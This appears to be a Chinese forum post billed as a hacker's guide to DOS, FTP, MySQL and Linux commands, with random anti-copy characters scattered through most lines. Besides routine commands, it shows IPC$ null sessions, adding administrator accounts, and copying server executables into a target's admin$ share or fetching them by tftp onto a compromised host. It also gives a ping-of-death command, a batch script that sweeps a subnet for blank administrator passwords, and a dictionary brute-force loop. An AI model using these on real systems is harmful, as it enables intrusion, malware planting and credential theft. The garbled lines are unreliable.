返回列表 发帖

黑客基础--最全的DOS命令

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 ' }9 q7 Y" r! I3 q$ }6 B& t" N
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 ! v) _% g: [, a5 A
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
" ]5 {" O! N+ X0 D! M6 b5 ]1 r. t' ~net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C:到本地为H: $ i& P" s8 v0 M4 }
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 / U' j, i3 u4 y' D
net use h: /del 删除映射对方到本地的为H:的映射
( Z! Z4 h* v. P  Q, k' B- Cnet user 用户名 密码 /add 建立用户
, }% e8 Q/ J; \+ t, Lnet user guest /active:yes 激活guest用户 + v4 y$ c7 I2 u2 q) P* \
net user 查看有哪些用户 % W1 T/ O- W, h' v' V, C
net user 帐户名 查看帐户的属性
7 _* I# h" b; \1 Z* K, q- nnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
" m: E3 B* o  A. L( N4 I3 |net start 查看开启了哪些服务 2 U$ ~1 w+ i1 D3 g! i$ I0 l* Y5 K
net start 服务名  开启服务;(如:net start telnet, net start schedule) 0 E5 R- P9 p+ b: V% j1 Q. A/ s
net stop 服务名 停止某服务 3 }7 y# ~1 b0 a) b* Q5 y
net time \\目标ip 查看对方时间   w* {" I( h% Z1 n: c* @
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 ) e% h. F( p. V6 c7 E4 M
net view 查看本地局域网内开启了哪些共享 8 s5 u  B! Z# ^) {( e: K, v
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 , K/ P. L/ x; Y% _
net config 显示系统网络设置
. L$ m7 G2 U  |$ W! p) L) mnet logoff 断开连接的共享 6 g+ ?" g, p& a  |' ?; J) {# K! p
net pause 服务名 暂停某服务 ( ?3 }" |  X- \9 x. ]1 h/ _
net send ip "文本信息" 向对方发信息
$ O) p$ @, {) S) @9 f, W  ~: unet ver 局域网内正在使用的网络连接类型和信息
( L8 j8 V* x" i/ V  j  a# `, anet share 查看本地开启的共享
; X: O2 J9 V0 L6 j. W1 d+ Gnet share ipc$ 开启ipc$共享 . S' m* a9 m0 j! q" S
net share ipc$ /del 删除ipc$共享 / a# j" V/ o1 k* V3 t
net share c$ /del 删除C:共享 . [2 m& x: j. m- d- q
net user guest 12345 用guest用户登陆后用将密码改为12345
0 s/ Z& R1 X5 q* knet password 密码 更改系统登陆密码
* O6 f+ A# A8 S3 Hnetstat -a 查看开启了哪些端口,常用netstat -an
$ [/ Q- I% s; Gnetstat -n 查看端口的网络连接情况,常用netstat -an
" k8 Q( Q- U& Z5 ?" L& }netstat -v 查看正在进行的工作
) a8 ~* D0 W2 a  N. ^- I8 znetstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) * X: o: v( s9 g! M6 y& Z! x
netstat -s 查看正在使用的所有协议使用情况
3 E- |3 Q! p1 t4 ^1 s* q! qnbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写 5 G( ]9 B5 Z  D$ Y- t1 Z
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。 ) M, z$ R) w2 h6 }( O9 \) L
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
: T+ e6 f( d" }/ Eping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) " q9 B. @- b6 \7 o9 L1 @, \
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
* R. K# ~1 Y1 Z' r4 m9 ^tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内) 0 V: m% t' L4 {9 W8 m3 m+ Y1 u( F- F
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
5 j; y  M. z) b4 g- \% P* g9 U5 F3 sdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
! `& [- U% L. F& _  t6 qdel /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
6 `/ Q# |0 y$ ~move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 9 a% t9 M6 e3 j; l) t, n
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
' V8 {4 A$ O" E/ Q) d/ Yat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
) |" J; t% T/ G' v' _# h0 q1 _at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止 . G" D/ O& I1 o5 d! L0 a  T  f) L
at id号 /delete 停止某个已注册的计划任务
5 P3 L* _; x! b9 H+ V4 E. Cat 查看所有的计划任务 5 o4 w) p$ H4 Z8 [7 _( H3 }) A$ s
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 3 Q  P0 B$ K' o- W  @3 K
finger username @host 查看最近有哪些用户登陆
5 \2 _& R( ]  Z9 qtelnet ip 端口 远和登陆服务器,默认端口为23 : Y; t' U) l8 Z' C& {! m; Y2 h
open ip 连接到IP(属telnet登陆后的命令)
/ r9 b7 h! u' b% htelnet 在本机上直接键入telnet 将进入本机的telnet
% h) m  i, [! |6 |. ?copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件 ( _6 {1 b0 F0 v' E5 y
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 ' w! `$ w8 u9 Z8 L/ H( v1 N- e
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件 6 K' g; d0 s2 \( ], l, N+ B5 j
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C: , u8 f# Q# |# y% @" x+ J
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件 & W- D+ o: w$ H
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送 / F# X1 u/ n7 G- J& n
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机 , V: `7 s$ B: A$ D; @
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) 1 n/ D% H& w  ?. a4 P# z
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface 9 w# K+ z7 A: l. x. M, V7 G: y
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
3 |, i. J/ ^( F8 D! @start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令 2 S$ w5 q% I) d. T' b2 r, ~
mem 查看cpu使用情况
2 H+ `0 A8 X6 \: f* w' m2 G; f6 Y2 Eattrib 文件名(目录名) 查看某文件(目录)的属性 1 H( v3 O( ^1 d/ h! Z8 m2 v% y4 m5 g
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
: T+ U$ D$ E+ G$ |dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 0 @5 ^- B0 H$ w) e; I
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
% q( N1 p# }4 i# gset 指定环境变量名称=要指派给变量的字符 设置环境变量
( v' X$ g+ ^& [! ^$ ?* r$ \set 显示当前所有的环境变量
7 V2 s) W3 [+ ~1 Gset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 & [; {" l' i# p* j
pause 暂停批处理程序,并显示出:请按任意键继续.... / G, n6 k. U% Q& z0 L4 N. ~
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
+ i  ~- g9 M( ]* s! E( M; P0 E$ ]goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
3 b+ |* w# e7 k8 t9 ccall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?) + J! ~0 f: D5 T$ @) n9 a* [' X8 d0 n
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
5 e0 `# i0 [9 N( Iecho on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 # r# B' Q3 |& a
echo 信息 在屏幕上显示出信息
( `6 U; m% y3 Z4 B! mecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中
4 ]! ]! g% y' pfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello ( C9 q+ }8 o; y) E! o& a
find 文件名 查找某文件 ' x% {& q0 g, C7 W
title 标题名字 更改CMD窗口标题名字
# [* u, L; f: n; r3 V" w  ycolor 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 8 N) d; _1 c5 U
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ ) 0 W4 ?# ^9 t4 R3 p6 V0 }: [
print 文件名 打印文本文件
2 w5 l0 Q$ L+ ^1 [- Y* F8 u0 over 在DOS窗口下显示版本信息
! G4 b3 ~& G4 s# K) ywinver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
& H% d3 [5 Y  B1 Pformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
' t- F% I% k3 @md 目录名 创建目录 * H) ^- m* H- r( C6 q5 q$ R* [
replace 源文件 要替换文件的目录 替换文件 6 ~+ a# N1 A$ S
ren 原文件名 新文件名 重命名文件名
- c" ]. K$ R+ L, Utree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
9 H; f, J1 \0 ^# itype 文件名 显示文本文件的内容 ' {7 F. F5 r! Y3 p/ K+ o
more 文件名 逐屏显示输出文件 5 N4 I; T( p( P  s9 r: R
doskey 要锁定的命令=字符
9 {1 S9 s/ I% s. mdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
* N7 w. D8 v, [) qtaskmgr 调出任务管理器
, Q) r6 m$ U1 H8 D  V  K' Bchkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
. H( f7 N$ m. t5 Ntlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口 : |* s2 H4 P! o; m3 M3 K4 y6 R& M# s
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
+ _" k& n. O, j% i( G) Bpath 路径\可执行文件的文件名 为可执行文件设置一个路径。 ; D; J  E8 b- [# }
cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?
+ L0 b4 R8 z" W, a' n5 Gregedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
$ ^! t) v4 V) b  ]regedit /e 注册表文件名 导出注册表 - R' }$ J1 l- n6 U  j
cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 ! X$ g# Z0 ]! `8 l. Z
cacls 文件名 查看文件的访问用户权限列表 3 Y: S- T$ Q9 n, L
REM 文本内容 在批处理文件中添加注解 : Z& C! \$ ?/ s0 ?1 ^$ e2 \
netsh 查看或更改本地网络配置情况
4 E2 z! ?4 D1 L- S9 lIIS服务命令:
- [( r) L% F8 Ciisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
7 X/ o' B" v& ^' P2 @& Viisreset /start或stop 启动(停止)所有Internet服务 7 C9 {+ s: O/ j. o' r( y
iisreset /restart 停止然后重新启动所有Internet服务 " C+ o% V4 |: w) J
iisreset /status 显示所有Internet服务状态 / y- \4 r5 V9 Q! M. ?9 U; a, ~' Q* q
iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动 6 I# L8 D) j0 b/ m
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机 % I$ d, P7 p+ ?$ X
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
" }& p& _# n$ y$ C7 g# Eiisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
8 _/ C% g! `2 R+ S- GFTP 命令: (后面有详细说明内容)
/ t- E# o! e/ I3 \9 tftp的命令行格式为:
" r* X, l3 g  H; ^3 C1 l, ]ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。; {' {7 B' T- ?3 N& }3 q
-d 使用调试方式。
4 _4 M- @! X! V; Z-n 限制ftp的自动登录,即不使用.netrc文件。5 l5 W0 V; Y5 N" p; c# p
-g 取消全局文件名。 $ T8 z/ \0 h% ?& w* T1 U
help [命令] 或 ?[命令] 查看命令说明
. N% `* l' {8 m, ~1 M/ i& Lbye 或 quit 终止主机FTP进程,并退出FTP管理方式.
( S/ f6 J# L# M9 \0 Z( I% }& n, upwd 列出当前远端主机目录
8 V0 w/ ~  M7 _% K6 X4 Uput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 9 c8 l# Y* L  H. P8 W' u- y
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
8 @) g) a' G2 Omget [remote-files] 从远端主机接收一批文件至本地主机 ( l2 @" ]/ M4 c( ^
mput local-files 将本地主机中一批文件传送至远端主机
% h! ~! S" k! Jdir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
6 ]8 O; R# e8 W! J3 {( ]/ uascii 设定以ASCII方式传送文件(缺省值)
$ F# p: \( G8 o+ u+ Y3 g( b- X7 cbin 或 image 设定以二进制方式传送文件
5 Y7 Q& z  f5 \5 b! {$ h) b- Ebell 每完成一次文件传送,报警提示
% P; ?. I+ o0 s2 A8 Y+ X$ Lcdup 返回上一级目录 1 N# X5 `; c( ^0 l. ~
close 中断与远程服务器的ftp会话(与open对应) ; ], T" q5 l( D$ I! }( Y3 H
open host[port] 建立指定ftp服务器连接,可指定连接端口
( u6 r' ]3 s# b4 d  l. D) Q& Z  `7 N  mdelete 删除远端主机中的文件 * B# F  |% V) R0 n2 z) [
mdelete [remote-files] 删除一批文件 $ Z) ^% h7 a; V; I
mkdir directory-name 在远端主机中建立目录 3 v! `9 o  [- i3 B1 {" U, }% D/ `
rename [from] [to] 改变远端主机中的文件名
7 W' F- T2 [6 m  w; G7 L. j% yrmdir directory-name 删除远端主机中的目录
5 d- I3 l( A9 D3 o, rstatus 显示当前FTP的状态 1 F: a- K: f' \% y; s5 B# d; F6 j
system 显示远端主机系统类型
1 `1 s& M# o- I' q. e7 k( k7 x& _user user-name [password] [account] 重新以别的用户名登录远端主机 , L+ j8 B( H3 |" o  V
open host [port] 重新建立一个新的连接
' A9 `0 X. I6 j. ]5 V" fprompt 交互提示模式
% \. |, r' U9 I. \/ w/ C, ?macdef 定义宏命令 8 q% ~  Q, Y. W9 @; N) _. h. W
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
1 p! x/ c! n4 j, M8 u, Ichmod 改变远端主机的文件权限
( ]8 E; }8 ~; M  |case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
  t7 f: p& R! gcd remote-dir 进入远程主机目录 : Q% |5 d& r' y
cdup 进入远程主机目录的父目录 9 {+ g5 c9 L: d7 N, T9 Z) [" J, ^* Y; u5 {
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
% ~/ C( G+ h+ J) d0 y  S7 L! ^MYSQL 命令:
! P  _5 G' `6 l) a  D2 cmysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。+ X  q/ p, i) M9 {
(例:mysql -h110.110.110.110 -Uroot -P123456 $ W: X- Z2 w: h# p. r( A- S4 \
注:u与root可以不用加空格,其它也一样) 6 ~  ^- G" F( X5 |/ q8 ~
exit 退出MYSQL 4 u9 d. S: `( N- B( W( g" ~/ Z2 P
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
& T! d. O$ H0 jgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
/ f: Y8 W6 _0 E& b5 U& }/ K2 J/ Rshow databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。 ; B( ^; s; e1 T
use mysql;3 m( d: s8 q  F  e
show tables; 显示库中的数据表 % _* A( s, R! [$ A( c$ T* `( |) a4 Y
describe 表名; 显示数据表的结构 7 o$ x% j( ^- w: X* i
create database 库名; 建库 . s( X7 r: e9 a4 B8 k  Z
use 库名;
7 C9 b1 u. g! E( V) ]2 wcreate table 表名 (字段设定列表); 建表
5 V/ Z3 U. z9 X, R# c2 Odrop database 库名; 5 s2 @+ U3 _1 j0 W
drop table 表名; 删库和删表
$ {6 A5 g, w  ~$ Ddelete from 表名; 将表中记录清空
) v: v3 P0 O# A% r' ?select * from 表名; 显示表中的记录 ( r& V' n7 x4 I" f8 x4 D, K
mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。 / [) c- T& Q# V' t
win2003系统下新增命令(实用部份): 2 F8 y8 n# E* I( {$ r
shutdown /参数 关闭或重启本地或远程主机。
: U1 E: \/ \- P/ s+ q参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。" @' y) |+ x0 X% t7 A9 m/ _" w
例:shutdown /r /t 0 立即重启本地主机(无延时) + ~5 @5 N& }! Y: ]! _% ]
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。. t" l8 \6 I. _5 @
参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。
6 L/ ?' r9 j' ]2 G. d! vtasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
) R/ @( S6 b4 e2 \/ d参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程, A9 m4 i# B8 c0 V" `
Linux系统下基本命令: 要区分大小写7 i$ A5 F1 y* m% H% y8 l
uname 显示版本信息(同win2K的 ver)
- {- s. ^$ T+ ]! e0 e2 @! ddir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)
, f+ k  `+ V7 O+ `' m8 M) c: Z/ b1 a- tpwd 查询当前所在的目录位置 6 ^5 S0 @/ {4 A
cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。
% h, `6 g: \1 Ocat 文件名 查看文件内容 1 f/ ?! P- ], y; e1 j' O
cat >abc.txt 往abc.txt文件中写上内容。 ( P' h' G, p( a' B$ J$ R
more 文件名 以一页一页的方式显示一个文本文件。
6 M. K. C/ g; ~3 e. Lcp 复制文件 ! j8 D0 \* ^, l  }4 m
mv 移动文件
: E7 E" r, L4 Orm 文件名 删除文件,rm -a 目录名删除目录及子目录
" d" J% |0 d3 |mkdir 目录名 建立目录
* g. h# I; j! l8 o, Prmdir 删除子目录,目录内没有文档。
$ O% K" Y1 \0 \! }chmod 设定档案或目录的存取权限 / P" a) H) l' z
grep 在档案中查找字符串
. c3 }$ d" |" I% q2 _' D* t5 xdiff 档案文件比较 - G) l( e: Q7 `
find 档案搜寻
6 M7 b3 a" e0 W) b2 P# B: c% w4 rdate 现在的日期、时间
1 Q2 ~; U: z, m8 ]" _who 查询目前和你使用同一台机器的人以及Login时间地点
; _4 S+ P* h/ ?# vw 查询目前上机者的详细资料
/ h3 N% e" Z. r3 ?0 s- Bwhoami 查看自己的帐号名称 & z- G' g. l2 {" K3 Y+ I
groups 查看某人的Group
! y. y4 g' l  n: Cpasswd 更改密码
# n; J5 O' ^" X0 n+ X' V; P$ [% Vhistory 查看自己下过的命令 0 T1 K% V- L% Q
ps 显示进程状态
1 f8 B4 l. ]6 z9 e+ mkill 停止某进程   E0 Q3 x: c; ?' N- ]8 r. ^
gcc 黑客通常用它来编译C语言写的文件
- I: h5 Y1 W1 {1 |, s0 x: Q" Jsu 权限转换为指定使用者 9 G/ W  e- B8 b
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。 ) \6 |! f  p7 }; b
ftp ftp连接上某服务器(同win2K* g+ |  ]  C+ {* m# A4 P* @8 A
附:批处理命令与变量" W, g7 `7 r% l* R: N
1:for命令及变量 基本格式:
7 {5 ]- o( W6 ]. O& \5 b: y' L: JFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。3 |/ i' y. Z* ~' }$ P6 _& K
批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
7 E+ R/ X5 {9 C0 I& ^(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1}
7 G5 O% d- r$ g$ W6 `' Acommand:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加:& 来隔开
5 }1 R! ]( R4 c! _8 I( a; ~  qcommand_parameters:为特定命令指定参数或命令行开关
* h1 u2 s% C0 t: p3 yIN (set):指在(set)中取值;DO command :指执行command5 T3 I8 I6 D9 z' V3 \
参数:/L 指用增量形式{(set)为增量形式时};/F 指从文件中不断取值,直到取完为止{(set)为文件时,如(d:\pass.txt)时}。
4 q0 n' o8 Q0 @" g5 v5 t; U用法举例: # @( I8 T; n  u% {+ ~
@echo off # `. E2 q: g/ r* K
echo 用法格式:test.bat *.*.* > test.txt
! }4 y% Z+ }0 P  P- M; ?. o' Yfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
8 l# w' z$ m8 F  D3 l存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
2 n  L! U# a) y( ]' Q# S/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。 * z. X: ?) O! M! r1 K( \! V
@echo off
3 \( r3 i5 D; j( Hecho 用法格式:ok.bat ip
5 g1 J0 X; g2 t9 A+ j5 hFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 . R7 q4 V* i4 V: e0 e# U/ _
存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。; V8 M" b, c. Q' _, Q: h
2:if命令及变量 基本格式:
8 w, e, S+ v* L) ?2 Z  RIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。
1 e4 Z" T2 r4 W. A# k7 q& d, r例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。
9 V  y1 G) e$ N, t0 指发现并成功执行(真);1 指没有发现、没执行(假)。
$ K1 v+ @) l% ?2 L' c0 L1 N" VIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。7 m8 g  x$ M* ]6 Q
例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")
4 R' R: `4 X7 M4 T- x% hIF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。
5 a7 `- v. e/ W. A例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。
" d& k$ K! {  j/ }( _$ KIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来,因为del命令要单独一行时才能执行,用上< >后就等于是单独一行了;例如:“if exist test.txt. <del test.txt.> else echo test.txt.missing ”,注意命令中的“.”

返回列表
【捌玖网络】已经运行: